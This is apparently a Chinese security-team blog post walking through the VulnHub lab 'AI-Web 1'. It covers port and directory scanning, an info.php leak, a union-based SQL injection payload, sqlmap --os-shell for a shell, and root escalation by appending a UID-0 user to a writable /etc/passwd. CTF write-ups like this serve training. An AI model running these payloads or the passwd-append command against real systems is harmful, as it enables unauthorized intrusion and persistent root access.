结束八天了,还是无法与她和解. --vulnhub 靶场

原创 探险者安全团队

探险者安全团队 2024年07月13日

嗯对，你猜的没错就是她,vulnhub 靶场 AI-Web 1
依旧是老规矩 ，狗头保命温馨提示.

阅读须知：
探险者安全团队技术文章仅供参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用本公众号所提供的技术和信息而造成的任何直接或者间接的后果及损失，均由使用者 本人负责，作者不为此承担任何责任,如有侵权烦请告知，我们会立即删除并致歉,创作不易转载请标明出处.感谢!

芜湖 ，保命成功......... 本来不想发这个文章的但是那天 结束的时候，看到后排的美女在 看wp 而无法反弹shell的时候，我就在想传 太复杂啦--------> (其实是我也弹不回来)----> 不如直接getshell

0x00信息收集
0x01性感端口扫描
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-06 11:24 CST Nmap scan report for 192.168.49.128 Host is up (0.00021s latency). Not shown: 999 closed tcp ports (reset)

PORT STATE SERVICE 80/tcp open http MAC Address: 00:0C:29:23:04:32 (VMware) # 详细信息: PORT STATE SERVICE VERSION 80/tcp open http Apache httpd |_http-title: AI Web 1.0 |_http-server-header: Apache | http-robots.txt: 2 disallowed entries |_/m3diNf0/ /se3reTdir777/uploads/ MAC Address: 00:0C:29:23:04:32 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop

资产整理
系统:Linux

服务器:Apache(版本未知)

信息泄露: robots.txt 路径泄露: /m3diNf0/ /se3reTdir777/uploads/
可以看出只有web资产---> 又是磨洋工(磨web)的一天

0x02扫描目录
200 - 80B - /robots.txt [11:49:01]

可以看到 robots.txt 除此之外没有什么别的东西了
403 了 因此http://192.168.49.128/m3diNf0/ 继续递归扫描目录
什么时候能学会 403 bypass

[14:57:12] 200 - 22KB - /m3diNf0/info.php
一个信息泄露 再次挨个扫目录不能说毫无收获

只能说是一无所获
0x10 web
信息泄露
http://192.168.49.128/m3diNf0/info.php 

哈哈哈 看来没有猜错OS

|7.2.19-0ubuntu0.18.04.2|
SQL注入
http://192.168.49.128/se3reTdir777
联合查询 注入 而且感觉是一个回显注入

poc
1' union select version(),2,3

First Name: aiweb1user@localhost Last Name: 5.7.42-0ubuntu0.18.04.1
0x20 Get_shell
目前就找到一个sql注入 根据sql注入做文章 先停止信息收集 最快可以getshell的只能是--os-shell

secure_file_priv 这个没在phpinfo()中查到

但是可以查到用户的相关信息，很可惜不是root。

怎么说呢 我现在觉得只能去盲猜测 secure.... 没被设置(呃呃呃呃 ，我实在记不住)

但是我们还要找到一个 当前用户有权限的一些路径 才能上传

试了常规的 /var/www/html 但是不行后来在info.php 找到了根目录

/home/www/html/web1x443290o2sdf92213
但是你以为找到根目录事情就结束了吗? (我确实这么认为的)

果然我才是个 joker

|/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/|这个才是 能够使用的绝对路径

直接一把梭 --os-shell

0x30 Post

第一步肯定是 linpeas 先上去扫一遍 怎么说呢....好像傻了一样 找了多攻击向量但是都用不成,

后来才发现 passwd 是属于我自己的 文件 我可以执行写操作,而并非是属于root的权限

果然还是不能把东西想的太高端

openssl passwd -1 -salt 123 123

echo "tom:$1$123$nE5gIYTYiF1PIXVOFjQaW/:0:0:root:/root:/usr/bin/zsh" >> /etc/passwd

su tom
拿到权限 ok 下机 ---- > 哎,等等 一条命令就可以解决哟，不需要传 (俺真的不会弹shell) ---> 下机......